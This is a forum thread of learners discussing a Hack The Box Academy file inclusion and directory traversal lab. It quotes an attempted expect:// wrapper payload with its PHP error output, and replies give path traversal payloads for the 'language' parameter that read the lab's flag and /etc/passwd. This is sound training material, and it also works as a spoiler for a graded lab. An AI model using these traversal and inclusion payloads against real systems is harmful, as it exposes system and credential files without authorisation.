Any one working on HTB Academy FILE INCLUSION / DIRECTORY TRAVERSAL?

anyone working on this module? im stuck in the second question about

“Submit the contents of the flag.txt file located in the /usr/share/flags directory.”

i tried using different methods like PHP Wrapper and Extension Bypass Using Null Byte, still not working getting an error msg

Warning: include(): Unable to find the wrapper “expect” - did you forget to enable it when you configured PHP? in /var/www/html/wrappers/index.php on line 47

Warning: include(expect://id): failed to open stream: No such file or directory in /var/www/html/wrappers/index.php on line 47

Warning: include(): Failed opening ‘expect://id’ for inclusion (include_path=‘.:/usr/share/php’) in /var/www/html/wrappers/index.php on line 47
Notice: Undefined variable: p2 in /var/www

Hello, that’s OK
?language=…//…//…//…//usr/share/flags/flag.txt

1 Like

Type your comment> @matongder said:

Hello, that’s OK
?language=…//…//…//…//usr/share/flags/flag.txt

thanks bro!

I can’t use this payload to get flag,
http://64.227.37.196:32729/index.php?language
this is my url

i get it:use language=/…/…/…/…/usr/share/flag.txt
thanks

I could read the flag with the same payload that worked for reading the content of /etc/passwd.

Which means the final url is:
http://<SERVER_IP>:<PORT>/index.php?language=../../../../usr/share/flags/flag.txt

Kind regards,
Cel